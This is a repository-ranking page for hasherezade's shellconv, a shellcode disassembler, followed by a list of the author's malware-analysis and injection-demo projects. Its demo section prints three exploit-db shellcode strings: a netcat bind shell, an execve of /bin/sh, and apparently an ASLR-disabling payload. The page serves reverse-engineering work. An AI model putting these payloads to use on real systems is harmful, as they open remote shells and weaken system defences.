Top Rating
- Top Contributors
  Discover the Top Open Source contributors by country or by language
- Interviews
  Discover real stories from Open Source developers
Discover

Discover your Favorite Language
Discover the top trending repositories and projects on Github. Explore the latest trends in your preferred languages.

Solidity

Objective-C

JavaScript

Emacs Lisp

Jupyter Notebook

Swift

Perl

R

More Languages
Awesome

Awesome repositories
Discover the most awesome repositories and projects of your favorite languages. Inspired by the Awesome-* lists trend in GitHub.

Racket

Java

Ruby

Swift

Ada

C

Zig

R

More Languages
By Country

Rankings by Country
Discover the community of talented open source contributors in each country.

🇱🇺 Luxembourg

🇧🇭 Bahrain

🇲🇴 Macao

🇴🇲 Oman

🇰🇮 Kiribati

🇬🇪 Georgia

🇲🇻 Maldives

🇦🇩 Andorra

All Countries Compare Countries

hasherezade/shellconv

Stars
144
Rank 247,462 (Top 6 %)
Language
Python
Created about 9 years ago
Updated almost 2 years ago

hasherezade/shellconv

hasherezade

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Small tool for disassembling shellcode (using objdump)

shellconv

Small tool for disassembling shellcode (using objdump)

usage: shellconv.py [-h] --infile INFILE [--arch ARCH] [--outfile OUTFILE]

arch: defined as in objdump -m, default: i386

DISCLAIMER

This tool is intended to be minimalistic.
It may not give proper results in case of complicated/obfuscated shellcode. In such cases, please refer to tools of appropriate complexity.

Installation

Requirements: Python3 (with PIP), objdump

Install the dependencies by:

pip install -r requirements.txt

Demo

https://www.exploit-db.com/exploits/36921/

expdb1.shc :

"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

https://www.exploit-db.com/exploits/36858/ expdb1_64.shc :

  char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=
\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";

https://www.exploit-db.com/exploits/36637/ expdb3.shc :

char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
"\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a�
�\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70�
�\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72�
�\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63�
�\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";

pe-bear

Portable Executable reversing tool with a friendly GUI

pe_to_shellcode

Converts PE into a shellcode

malware_training_vol1

Materials for Windows Malware Analysis training (volume 1)

hollows_hunter

Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

libpeconv

A library to load, manipulate, dump PE files. See also: https://github.com/hasherezade/libpeconv_tpl

tiny_tracer

A Pin Tool for tracing API calls etc

demos

Demos of various injection techniques found in malware

pe-bear-releases

PE-bear (builds only)

dll_to_exe

Converts a DLL into EXE

exe_to_dll

Converts a EXE into DLL

bearparser

Portable Executable parsing library (from PE-bear)

process_ghosting

Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

mal_unpack

Dynamic unpacker based on PE-sieve

process_doppelganging

My implementation of enSilo's Process Doppelganging (PE injection technique)

transacted_hollowing

Transacted Hollowing - a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging

malware_analysis

Various snippets created during malware analysis

ida_ifl

IFL - Interactive Functions List (plugin for IDA Pro)

module_overloading

A more stealthy variant of "DLL hollowing"

process_overwriting

Yet another variant of Process Hollowing

IAT_patcher

Persistent IAT hooking application - based on bearparser

persistence_demos

Demos of various (also non standard) persistence methods used by malware

chimera_pe

ChimeraPE (a PE injector type - alternative to: RunPE, ReflectiveLoader, etc) - a template for manual loading of EXE, loading imports payload-side

masm_shc

A helper utility for creating shellcodes. Cleans MASM file generated by MSVC, gives refactoring hints.

antianalysis_demos

Set of antianalysis techniques found in malware

password_scrambler

Password scrambler - a deterministic password re-generator (alternative to a password manager)

dll_injector

A simple commandline injector using classic DLL injection

funky_malware_formats

Parsers for custom malware formats ("Funky malware formats")

process_chameleon

A process overwriting its own PEB to make an illusion that it has been loaded from a different path.

mal_unpack_drv

MalUnpack companion driver

crypto_utils

Set of my small utils related to cryptography, encoding, decoding etc

ViDi

ViDi Visual Disassembler (experimental)

pe2pic

Small visualizator for PE files

pin_n_sieve

An experimental dynamic malware unpacker based on Intel Pin and PE-sieve

paramkit

A small library helping to parse commandline parameters (for C/C++)

petya_recovery

Application for cracking Red Petya key based on genetic algorithms.

petya_key

A decoder for Petya victim keys, using the Janus' masterkey.

libpeconv_tpl

A ready-made template for a project based on libpeconv.

pe_unmapper

Small tool to convert beteween the PE alignments (raw and virtual).

flareon2019

Flare-On solutions

mal_sort

Various scripts helpful in sorting collections of malware samples.

pesieve-go

Golang bindings for PE-sieve

IAT_patcher_samples

Sample libraries to be used with IAT Patcher

pe_utils

A set of small utilities, helpers for PIN tracers

hidden_bee_tools

Parser for a custom executable format from Hidden Bee malware (first stage)

mal_unpack_py

Python wrappers for mal_unpack

decryptors_archive

Archive of ransomware decryptors

flareon2022

asm16_projects

My small projects writen in 16 bit asm (NOTE: those are my practice projects that I wrote when I was 15, I give no warranty for this code!)

tag_converter

petya_green

Application for random attack on Green Petya's key

bootldr_demo

Demo bootloaders - created just for fun

metasploit_modules

My metasploit modules

loaderine

A demo implementation of a well-known technique used by some malware to evade userland hooking, using my library: libpeconv.

jpassword_scrambler

Small utility to generate complicated passwords - version with GUI

beardisasm

A wrapper for capstone for bearparser

bunitu_tests

Scripts for communication with Bunitu Trojan C&Cs

7ev3n_decoders

Decoders for 7ev3n ransomware

libpeconv_and_detours_tpl

A template for projects using both libPeConv and MS Detours

sig_finder

Signature finder (from PE-bear)

detours_cmake_tpl

A CMake template for projects using MS Detours

passcrambler

https://hasherezade.github.io/passcrambler/

challs

My solutions for random crackmes and other challenges

wke_exercises

My solutions for HackSys Extreme Vulnerable Driver

drawings

Some of my drawings

pe_recovery_tools

A placeholder repository

hasherezade.github.io

My projects' homepage

mastercoder2014

libpeconv_demo

Demo projects and utilities made with the help of libPeConv

bearparser_tests

External tests for bearparser

libpeconv_wrappers

A ready-made template for a new project based on libPeConv library

hasherezade

paramkit_tpl

A template for a project using ParamKit

pesieve_tests

External tests for PE-sieve